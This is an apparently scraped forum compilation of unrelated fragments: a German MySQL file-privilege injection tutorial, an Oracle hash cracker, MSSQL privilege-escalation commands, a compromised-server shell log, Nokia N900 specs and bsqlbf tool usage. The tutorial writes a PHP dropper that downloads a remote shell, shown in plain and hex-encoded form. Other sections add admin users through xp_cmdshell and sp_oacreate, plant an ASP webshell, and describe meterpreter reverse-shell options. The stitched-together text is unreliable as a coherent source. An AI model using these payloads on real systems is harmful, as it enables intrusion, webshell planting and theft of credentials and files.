~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
*******************************************************
#            WEBSECURITY DOCUMENTATION                #
#        --------------------------------------       #
#          SQL Injection with File Privileges         #
#        --------------------------------------       #
#                                                     #
#                                                     #
#  [+] written by fred777 [fred777.5x.to]             #
#                                                     #
******************************************************
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

--[0x00]-- Intro

--[0x01]-- Knowledge
   [1] Load_File
   [2] Dumpfile und Outfile

--[0x02]-- Exploiting
   [1] Privilegien mit mysql.user
   [2] Privilegien mit information_schema
   [3] Directories mittels Error
   [4] Directories mittels Configfiles
   [5] Schreiben mit DUMPFILE

--[0x03]-- Finito

********************************************************
##################################################

--[0x00]-- Intro

Willkommen zu meinem Tutorial über die File Privilegien bei SQL Injections.
Ich denke auch hier werden ich nicht jeden Befehl erklären, da er in anderen Tutorials bereits
erklärt wurde...
Neue Sachen werden selbstverständlich dokumentiert.

#############################################################

--[0x01]-- Knowledge

-------------------------------------------------------
 [1] LOAD_FILE
-------------------------------------------------------

Wir werden wie schon bekannt mit Selectqueries arbeiten, doch kommt noch etwas Neues hinzu, zum
ersten mal LOAD_FILE(). Sofern die Rechte stimmen, wird das angegebene File gelesen,
der Inhalt als String zurückgegeben und das Resultat ausgegeben.
Die Datei muss lesbar sein und kleiner sein als max_allowed_packet Bytes. Ansonsten wird NULL
zurückgegeben.
Der Syntax ist recht einfach: LOAD_FILE('<absoluter pfad>')

-------------------------------------------------------
 [2] Dumpfile und Outfile
-------------------------------------------------------

Kommen wir nun zu INTO OUTFILE und INTO DUMPFILE, hier werden die angegebenen Datensätze
in eine Datei (OUTFILE) geschrieben. Auch hier muss natürlich die Berechtigung stimmen.
Allerdings muss OUTFILE 'file' ein nicht vorhandenes File sein, sonst könnte man einfach die
etc/passwd überschreiben oder Sonstiges anrichten. 
Die Datei kann von allen Benutzern geschrieben werden, da MySQL Server selbst gar keine Datei erstellen kann, 
deren Besitzer jemand anders als der eigentliche Benutzer ist, insofern ist es schlecht, 
mysqld als root auszuführen. Doch was ist der Unterschied von INTO OUTFILE und INTO DUMPFILE?
Mit Dumpfile wird nur ein Datensatz verwendet ohne lästige Zeichen wie Trennunszeichen etc..
Deshalb verwenden wir hier ebenfalls DUMPFILE.

Syntax: SELECT * INTO DUMPFILE '<absoluter pfad>'

##############################################################

--[0x02]-- Exploiting

Wir haben also eine Lücke und eine Ausgabe:
www.seite.de/index.php?id=777+union+select+1,2,3,4-- f  => 3 wird ausgegeben

Schauen wir doch gleich mal, ob magic_quotes on oder off sind, d.h. ob bestimmte Zeichen
escaped werden..

www.seite.de/index.php?id=777+union+select+1,2,'test',4-- f  => test wird ausgegeben

-------------------------------------------------------
 [1] Privilegien mit mysql.user
-------------------------------------------------------

Umso besser, wir müssen nicht mit hex arbeiten. Unser Ziel ist es, am Schluss eine Shell auf den
Server zusetzen, bzw auszuführen. Zuerst schauen wir allerdings ob uns die File Privilegien gegeben sind.
Dafür gibt es mehrere Möglichkeiten dies herauszufinden. Erstens über die mysql.user Tabelle.
Wir benötigen natürlich die Rechte für aktuellen User, welchen wir mit user() auslesen können:

www.seite.de/index.php?id=777+union+select+1,2,user(),4-- f  => fred@localhost wird ausgegeben

Wie gesagt, die File Privilegien liegen als Column 'file_priv' in der mysql.user Table:

www.seite.de/index.php?id=777+union+select+1,2,concat(username,0x3a,file_priv),4+from+mysql.user+limit+0,1 -- f  => YES

Mit Limit gehen wir die User durch und schauen wie es mit unseren steht, es wird YES ausgegeben, d.h. die Rechte
sind gegeben.

-------------------------------------------------------
 [2] Privilegien mit information_schema
-------------------------------------------------------

Die zweite Möglichkeit funktioniert nur ab Version 5 mittels der INFORMATION_SCHEMA Datenbank, auch hier sind
die Rechte gespeichert, und zwar in der Table: user_privileges
Wir sagen, wir möchten den Usernamen (grantee) und die Option (is_grantable) haben mit dem Privilegientyp FILE:

www.seite.de/index.php?id=777+union+select+1,2,concat(grantee,0x3a,is_grantable),4+from+information_schema.user_privileges+where+privilege_type='file'+limit+0,1 -- f

Auch hier suchen wir mit Limit nach unserem user aus user() und schauen ob NO oder YES ausgegeben wird.
Natürlich könnten wir auch eine WHERE Bedingung starten, welche uns direkt den User ausgibt, doch damit steigt
auch die Fehlerquote, deshalb machen wir es einfach mit Limit. Man muss natürlich auf magic_quotes achten, falls
es auf ON steht, werden z.B. ' escaped, dann muss mit Hex gearbeitet werden.

-------------------------------------------------------
 [3] Directories mittels Error
-------------------------------------------------------

So, jetzt wissen wir, dass die nötigen Rechte gegeben sind. Da wir ja später in eine Datei schreiben möchten,
brauchen wir erstmal Informationen über das Betriebssystem, sowie den richtigen Pfad, dass unsere Datei
dann auch mittels dem Webserver freigegeben wird.
Um an den Pfad zu gelangen gibt es auch verschiedene Möglichkeiten, z.B. durch einen Error, welcher
automatisch den Pfad der Datei ausgeben kann, dies kann einfach dur einen invaliden Query passieren:

www.seite.de/index.php?id=777'''''-- f    =>

mysql_fetch_array() Error..... in /var/fred/www/mysql.php

Somit wissen wir, dass die Seite ziemlich sicher auf Linux läuft und wir können unser Load_file gleich mal testen. 
Eine Datei welche bei Linux immer vorhanden ist, ist etc/passwd.

www.seite.de/index.php?id=777+union+select+1,2,load_file('/etc/passwd'),4-- f
Tada, es erscheint der Inhalt wie erwünscht.

Usere Datei später können wir also einfach nach /var/fred/www/<unseredatei> schreiben lassen.

Bei Windows würde der Pfad etwa so aussehen:
mysql_fetch_array()..... in C:\xampp\htdocs\sql.php
Und die Datei welche bei Windows eigentlich immer besteht ist C:\boot.ini

www.seite.de/index.php?id=777+union+select+1,2,load_file('C:\boot.ini'),4-- f

-------------------------------------------------------
 [4] Directories mittels Configfiles
-------------------------------------------------------

Eine andere Methode ist die Configdatei des Webservers auszulesen, hilfreich dann z.B.
wenn kein Error erscheint. Wir nehmen mal an, es wird Apache benutzt. Häufig sitzt das
File so:

/etc/init.d/apache
/etc/init.d/apache2
/etc/httpd/httpd.conf
/etc/apache/apache.conf
/etc/apache/httpd.conf
/etc/apache2/apache2.conf
/etc/apache2/httpd.conf
/usr/local/apache2/conf/httpd.conf
/usr/local/apache/conf/httpd.conf
/opt/apache/conf/httpd.conf
/home/apache/httpd.conf
/home/apache/conf/httpd.conf

Sollte nicht Apache benutzt werden, kann man sich das Package immer noch laden und
manuell nach schauen. Um die Dateien auszulesen, benutzen wir wieder load_file()..

www.seite.de/index.php?id=777+union+select+1,2,load_file('/etc/apache/apache.conf'),4-- f

-------------------------------------------------------
 [5] Schreiben mit DUMPFILE
-------------------------------------------------------

So kommen wir nun zu INTO DUMPFILE, printipiell wird einfach das was selected wird in 
eine Datei geschrieben, einfach unter Linux im TMP Ordner zu zeigen:

www.seite.de/index.php?id=777+union+select+1,2,'test',4+INTO DUMPFILE+'/tmp/1.txt'-- f

Wir bekommen einen Error, das soll uns aber nicht aufhalten, wir benutzen load_file
um den Inhalt anzuzeigen:

www.seite.de/index.php?id=777+union+select+1,2,load_file('/tmp/1.txt'),4-- f => 12test4

Es funktioniert also wunderbar.
Jetzt können wir unsere eigenen Files erstellen, eine Shell z.B., da das aber eine Menge Text
ist, wäre ein Uploader sicher besser, außerdem soll unsere Datei ja im richtigen Verzeichnis laden.
PHP Files z.B. warten ja darauf ausgeführt zu werden. Ich nehme dazu einen relativ kleinen Code,
welcher, sobald ausgeführt, eine Shell erstellt.

<?$c=fopen("shell.php","a");fwrite($c,file_get_contents("http://seite.de/shell.txt"));?>

www.seite.de/index.php?id=777+union+select+1,2,'<?$c=fopen("shell.php","a");fwrite($c,file_get_contents("http://seite.de/shell.txt"));?>',4+into+DUMPFILE+'/var/fred/www/1.php'-- f

Sollte uns durch z.B. den mySQL Error nur ein Teil des Pfades gezeigt werden, 
können wir immer noch mit ../../../../../ weiter zurück springen.

www.seite.de/index.php?id=777+union+select+1,2,'<?$c=fopen("shell.php","a");fwrite($c,file_get_contents("http://seite.de/shell.txt"));?>',4+into+DUMPFILE+'../../www/1.php'-- f

Natürlich funktioniert das auch mit Hex, keine Angst vor der Länge des Strings:

www.seite.de/index.php?id=777+union+select+1,2,
0x3c3f24633d666f70656e28227368656c6c2e706870222c226122293b6677726974652824632c66696c655f6765745f636f6e74656e74732822687474703a2f2f73656974652e64652f7368656c6c2e7478742229293b3f3e
,4+into+dumpfile+'../../www/1.php'-- f

So, jetzt sollte in diesem Verzeichnis die 1.php erstell worden sein und bei Aufruf wird eine Shell erstellt, bzw. 
eine Datei mit dem Code, welcher in der TXT Datei steht. Haben wir das richtige Verzeichnis gewählt, ist die
1.php auf: www.seite.de/1.php verfügbar

Es hat also alles geklappt, unter Windows wäre das nicht viel anders abgelaufen:
Wir testen:
www.seite.de/index.php?id=777+union+select+1,2,'test',4+into+dumpfile+'C:\1.txt'-- f 
www.seite.de/index.php?id=777+union+select+1,2,load_file('C:\1.txt'),4-- f  => 12test4

Alles funktioniert, jetzt also den absoluten Pfad der Seite C:\xampp\htdocs\sql.php

und unsern lieben Text wieder:
www.seite.de/index.php?id=777+union+select+1,2,'<?$c=fopen("shell.php","a");fwrite($c,file_get_contents("http://seite.de/shell.txt"));?>',4+into+DUMPFILE+'C:\xampp\htdocs\test\1.php'-- f
Und das ganze aufrufen:
www.seite.de/test/1.php => Shell wird erstellt und ist unter
www.seite.de/test/shell.php verfügbar

#################################################################

--[0x03]-- Finito

So ich hoffe ihr habt alles so weit verstanden. Falls nicht, lieber noch meine anderen
Paper lesen auf fred777.5x.to

#!python 
 
# PoC Oracle 11g Database password-hash cracker 
# This program uses the password hash value spare from the internal 
# oracle user-database and a list of passwords via stdin to calculate a new 
# hash value of the plaintext password. The new generated hash value is subsequently 
# compared against the hash-value from sys.user, the internal oracle user-database. 
 
# Author: Thorsten Schroeder <ths theAthing recurity-labs.com> 
# Berlin, 19. Sep. 2007 
 
# TODO: 
# cut passwords at length 30 
 
import hashlib 
import binascii 
import sys 
 
def main(): 
 
    if( len(sys.argv) != 60 ): 
     usage() 
     sys.exit(1) 
 
    try: 
        oraHash = sys.argv[1] 
        oraSalt = oraHash[40:60] 
        oraSha1 = oraHash[:40] 
        oraSha1 = oraSha1.upper() 
 
        print "[+] using salt: 0x%s" % oraSalt 
        print "[+] using hash: 0x%s" % oraSha1 
 
        for passwd in sys.stdin: 
            passwd = passwd.rstrip() 
            #print "[*] trying password "%s"" % passwd 
 
            s = hashlib.sha1() 
            s.update(passwd) 
            s.update(binascii.a2b_hex(oraSalt)) 
            if( s.hexdigest().upper() == oraSha1 ): 
                print "[*] MATCH! -> %s" % passwd 
                sys.exit(0) 
 
    except Exception, e: 
            print "[!] Error: ", e 
            usage() 
    raise 
 
    sys.exit(0) 
 
def usage(): 
    print "[+] usage: ./ora11gPWCrack.py <hex-value> < wordlist.txt" 
    return 
 
if __name__ == '__main__': 
    main()

这几天一口气看完，全身舒畅

吐血推荐！

what a fucking program！fuck punbb,it's a piece of shit!!!!

1、连接数据库

driver={SQL Server};server=服务器IP;uid=用户名;pwd=密码;database=数据库名

2、添加新用户

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 新用户 密码 /add'

3、把用户加到管理组

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 新用户 /add'

4、激活GUEST用户

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user guest /active:yes'

5、把Guest加到管理组

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup Administrators Guest /add'

列目录
exec master.dbo.xp_subdirs 'c:\'

exec master.dbo.xp_dirtree 'c:',1,1  db_owner权限可以执行

exec master.dbo.xp_dirtree 'c:/Program Files',1,1

执行命令
exec master.dbo.xp_cmdshell ''

程序代码,写入webshell

exec master.dbo.xp_subdirs 'd:\web\www.xx.com';
exec sp_makewebtask 'd:\web\www.XXXX.com\XX.asp','select''<%execute(request("SB"))%>''

别说我会perl ,会python 要懂shell干什么，但是用的多了你就会发现，很多时候shell的力量是很惊人的。

比如apache日志中我想统计，访问了哪些文件
awk '{ print $7 }' access_log | cut -d '?' -f 1 | sort -u

$7这个可能需要你自己确定一下，有个access_log的URI可能不在第7列。

再比如将某个文件中的某些字符替换成其他的
以前我喜欢用sed -i 's/xxx/yyy/g' xxx.txt
后来发现replace 命令也很好用

replace xxx yyy -- xxx.txt

后面想到什么就会跟贴

PS：这个网站的软件不少 自己发掘吧

A history of WEP and RC4

WEP was previously known to be insecure. In 2001 Scott Fluhrer, Itsik Mantin, and Adi Shamir published an analysis of the RC4 stream cipher. Some time later, it was shown that this attack can be applied to WEP and the secret key can be recovered from about 4,000,000 to 6,000,000 captured data packets. In 2004 a hacker named KoReK improved the attack: the complexity of recovering a 104 bit secret key was reduced to 500,000 to 2,000,000 captured packets.

In 2005, Andreas Klein presented another analysis of the RC4 stream cipher. Klein showed that there are more correlations between the RC4 keystream and the key than the ones found by Fluhrer, Mantin, and Shamir which can additionally be used to break WEP in WEP like usage modes.

The aircrack-ptw attack

The aircrack team were able to extend Klein’s attack and optimize it for usage against WEP. Using this version, it is possible to recover a 104 bit WEP key with probability 50% using just 40,000 captured packets. For 60,000 available data packets, the success probability is about 80% and for 85,000 data packets about 95%. Using active techniques like deauth and ARP re-injection, 40,000 packets can be captured in less than one minute under good condition. The actual computation takes about 3 seconds and 3 MB main memory on a Pentium-M 1.7 GHz and can additionally be optimized for devices with slower CPUs. The same attack can be used for 40 bit keys too with an even higher success probability.

Countermeasures

We believe that WEP should not be used anymore in sensitive environments. Most wireless equipment vendors provide support for TKIP (as known as WPA1) and CCMP (also known as WPA2) which provides a much higher security level. All users should switch to WPA1 or even better WPA2.

You can download aircrack-ptw here:

http://www.cdc.informatik.tu-darmstadt. … 0.0.tar.gz

Or read more here.
http://www.cdc.informatik.tu-darmstadt.de/aircrack-ptw/

Find an aircrack-ptw How To here.

total 80
drwxrwxrwx 2 apache apache  4096 May 21 01:05 .
drwxr-xr-x 4 apache apache  4096 May 21 00:57 ..
-rwxrwxrwx 1 apache apache  9113 Sep 11  2009 exploit.c
-rwxrwxrwx 1 apache apache   358 Sep 11  2009 exploit-pulseaudio.c
-rwxr-xr-x 1 apache apache 11071 May 21 01:05 local
-rwxrwxrwx 1 apache apache  1127 Sep 11  2009 run
-rwxrwxrwx 1 apache apache  1068 Sep 11  2009 runcon-mmap_zero
-rwxrwxrwx 1 apache apache  1018 Sep  7  2009 sesearch-mmap_zero
bash-3.2$ ./local
bash: ./local: Permission denied
bash-3.2$ id
uid=48(apache) gid=48(apache) groups=48(apache),106(nagios),503(ftpadmin) contex
t=user_u:system_r:httpd_t:s0
bash-3.2$ w
 01:36:43 up 107 days, 14:16,  0 users,  load average: 0.79, 1.55, 1.95
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
bash-3.2$ last
last: /var/log/wtmp: Permission denied
bash-3.2$ uptime
 01:36:48 up 107 days, 14:16,  0 users,  load average: 0.73, 1.53, 1.94
bash-3.2$

这样的没什么权限.
怎么办
有gcc权限

Display3.5 inch touch-sensitive widescreen display
800 × 480 pixel resolution
Language supportBritish English, American English, Canadian French, Czech, Danish, Dutch, Finnish, French, German, Italian, Norwegian, Polish, Portuguese, Spanish, Latin American Spanish, Swedish, Russian

Connectivity3.5mm AV connector
TV out (PAL/NTSC) with Nokia Video Connectivity Cable
Micro-USB connector, High-Speed USB 2.0
Bluetooth v2.1 including support for stereo headsets
Integrated FM transmitter
Integrated GPS with A-GPS
BatteryBL-5J 1320mAh

Processor and 3D acceleratorTI OMAP 3430: ARM Cortex-A8 600 MHz, PowerVR SGX with OpenGL ES 2.0 support

MemoryUp to 1GB of application memory (256 MB RAM, 768 MB virtual memory)

Size and weightVolume: Approx 113cc Dimensions: 110.9 × 59.8 × 18 (19.55 at thickest part) mm Weight: Approx 181g Mass memory32 GB internal storage
Store up to 7000 MP3 songs or 40 hours of high-quality video
Up to 16 GB of additional storage with an external microSD card
Keys and input methodFull QWERTY tactile keyboard
Full QWERTY onscreen keyboard
ColourBlack

Operating frequencyQuad-band GSM EDGE 850/900/1800/1900
WCDMA 900/1700/2100 MHz
Data networkGPRS class A, multislot class 32, maximum speed 107/64.2 kbps (DL/UL) EDGE class A, multislot class 32, maximum speed 296/177.6 kbps (DL/UL) WCDMA 900/1700/2100. Maximum speed PS 384/384 kbps (DL/UL) HSPA 900/1700/2100. Maximum speed PS 10/2 Mbps (DL/UL) WLAN IEEE 802.11b/g

Call featuresIntegrated hands-free stereo speakers
Call waiting, call hold, call divert
Call timer
Logging of dialed, received and missed calls
Speed dialing via contact widget
Virbrating alert (internal)
Side volume keys
Mute/unmute
Contacts with images
Conference calling with up to 3 participants
Internet calling
Email & MessagingSupported protocols: Mail for Exchange, IMAP, POP3, SMTP
Support for email attachments
Support for rich HTML
SMS and Instant Messages as conversations
Support for Nokia Messaging service
Instant messaging and presence enhanced contacts
Multiple number, email and Instant Messaging details per contact, contacts with images
Support for assigning images to contacts
Web browsingMaemo browser powered by Mozilla technology
Adobe Flash™ 9.4 support
Full screen browsing
GPSIntegrated GPS, Assisted-GPS, and Cell-based receivers
Pre-loaded Ovi Maps application
Automatic geotagging
Camera5 megapixel camera (2584 × 1938 pixels)
Image formats: JPEG
CMOS sensor, Carl Zeiss optics, Tessar lens
3 × digital zoom
Autofocus with assist light and two-stage capture key
Dual LED flash
Full-screen viewfinder
Photo editor on device
TV out (PAL/NTSC) with Nokia Video Connectivity Cable (CA-75U, included in box) or WLAN/UPnP
Landscape (horizontal) orientation
Capture modes: Automatic, portrait, video, macro, landscape, action
VideoWide aspect ratio 16:9 (WVGA)
Video recording file format: .mp4; codec: MPEG-4
Video recording at up to 848 × 480 pixels (WVGA) and up to 25fps
Video playback file formats: .mp4, .avi, .wmv, .3gp; codecs: H.264, MPEG-4, Xvid, WMV, H.263
Music and audio playbackMaemo media player
Music playback file formats: .wav, .mp3, .AAC, .eAAC, .wma, .m4a
Built-in FM transmitter
Ring tones: .wav, .mp3, .AAC, .eAAC, .wma, .m4a
FR, EFR, WCDMA, and GSM AMR
PersonalisationBackground pictures
Widgets on your desktops
Intelligent contact shortcuts
Shortcuts to your favourite websites
Shortcuts to applications
Themes
Operating systemMaemo 5 software on Linux

ApplicationsMaemo Browser
Phone
Conversations
Contacts
Camera
Photos
Media player
Email
Calendar
Ovi Maps
Clock
Notes
Calculator
PDF reader
File manager
RSS reader
Sketch
Games
Widgets
Application manager for downloads
GamingBounce
Chess
Mahjong
What´s in the boxNokia N900
Nokia Battery (BL-5J)
Nokia High Efficiency Charger (AC-10)
Nokia Stereo Headset (WH-205)
Video out cable (CA-75U)
Nokia charger adaptor (CA-146C)
Cleaning cloth

http://backtrack.offensive-security.com … release.29

学习资料，全E文！！

TNND,这破网站不稳定，我N天都没打开，害死我了。

今天好不容易打开了 就保存了一份，共享出来。。  如果大家打不开就下载吧！

0. MS-SQL

1. MySQL

2. PostgreSQL

3. Oracle

The tool supports 8 attack modes(-type switch):-
Type 0: Blind SQL Injection based on true and false conditions returned by back-end server

Type 1: Blind SQL Injection based on true and error(e.g syntax error) returned by back-end server.

Type 2: Blind SQL Injection in "order by" and "group by".

Type 3: extracting data with SYS privileges (ORACLE dbms_export_extension exploit)

Type 4: is O.S code execution (ORACLE dbms_export_extension exploit)

Type 5: is reading files (ORACLE dbms_export_extension exploit, based on java)

Type 6: is O.S code execution DBMS_REPCAT_RPC.VALIDATE_REMOTE_RC exploit

Type 7: is O.S code execution SYS.KUPP$PROC.CREATE_MASTER_PROCESS(), DBA Privs

    -cmd=revshell Type 7 supports meterpreter payload execution, run generator.exe first

Type 8: is O.S code execution DBMS_JAVA_TEST.FUNCALL, with JAVA IO Permissions

    -cmd=revshell Type 8 supports meterpreter payload execution, run generator.exe first

For Type 4(O.S code execution) the following methods are supported:

-stype: How you want to execute command:

    SType 0 (default) is based on java..will NOT work against XE.

    SType 1 is against oracle 9 with plsql_native_make_utility.

    SType 2 is against oracle 10 with dbms_scheduler.

Usage example:

$./bsqlbf-v2.pl -url http://192.168.1.1/injection_string_post/1.asp?p=1 -method post -match true -database 0 -sql "select top 1 name from sysobjects where xtype='U'"

./bsqlbf-v2.3.pl -url http://192.168.1.1/injection_string_post/1.jsp?p=1 -type 4 -match "true" -cmd "ping notsosecure.com"
User Interface:

ubuntu@ubuntu:~$ ./bsqlbf-v2-3.pl

// Blind SQL injection brute forcer \\ //originally written by...aramosf@514.es \\ // mofified by sid-at-notsosecure.com \\ // http://www.notsosecure.com \\ ---------------------usage:-------------------------------------------

Integer based Injection-->./bsqlbf-v2-3.pl - url http://www.host.com/path/script.php?foo=1000 (options) String Based Injection-->./bsqlbf-v2-3.pl - url http://www.host.com/path/script.php?foo=bar' (options) ------------------------------------options:-------------------------- -sql: valid SQL syntax to get; version(), database(), (select table_name from inforamtion_schema.tables limit 1 offset 0) -get: If MySQL user is root, supply word readable file name -blind: parameter to inject sql. Default is last value of url -match: RECOMMENDED string to match in valid query, Default is auto -start: if you know the beginning of the string, use it. -length: maximum length of value. Default is 32. -time: timer options: 0: dont wait. Default option. 1: wait 15 seconds 2: wait 5 minutes

-type: Type of injection: 0: Type 0 (default) is blind injection based on True and False responses 1: Type 1 is blind injection based on True and Error responses 2: Type 2 is injection in order by and group by 3: Type 3 !!New!! is extracting data with SYS privileges (ORACLE dbms_export_extension exploit) 4: Type 4 !!New!! is O.S code execution (ORACLE dbms_export_extension exploit) 5: Type 5 !!New!! is reading files (ORACLE dbms_export_extension exploit, based on java)

-file: File to read (default C:\boot.ini)

-stype: How you want to execute command: 0: SType 0 (default) is based on java..will NOT work against XE 1: SType 1 is against oracle 9 with plsql_native_make_utility 2: SType 2 is against oracle 10 with dbms_scheduler -database: Backend database: 0: MS-SQL (Default) 1: MYSQL 2: POSTGRES 3: ORACLE -rtime: wait random seconds, for example: "10-20". -method: http method to use; get or post. Default is GET. -cmd: command to execute(type 4 only). Default is "ping 127.0.0.1." -uagent: http UserAgent header to use. Default is bsqlbf 2.3 -ruagent: file with random http UserAgent header to use. -cookie: http cookie header to use -rproxy: use random http proxy from file list. -proxy: use proxy http. Syntax -proxy=http://proxy:port/ -proxy_user: proxy http user -proxy_pass: proxy http password

---------------------------- examples:------------------------------- bash# ./bsqlbf-v2-3.pl -url http://www.somehost.com/blah.php?u=5 -blind u -sql "select table_name from imformation_schema.tables limit 1 offset 0" -database 1 -type 1

bash# ./bsqlbf-v2-3.pl -url http://www.buggy.com/bug.php?r=514&p=foo' -method post -get "/etc/passwd" -match "foo"

Donations: If you find this tool helpful and would like to make a donation, please visit www.notsosecure.com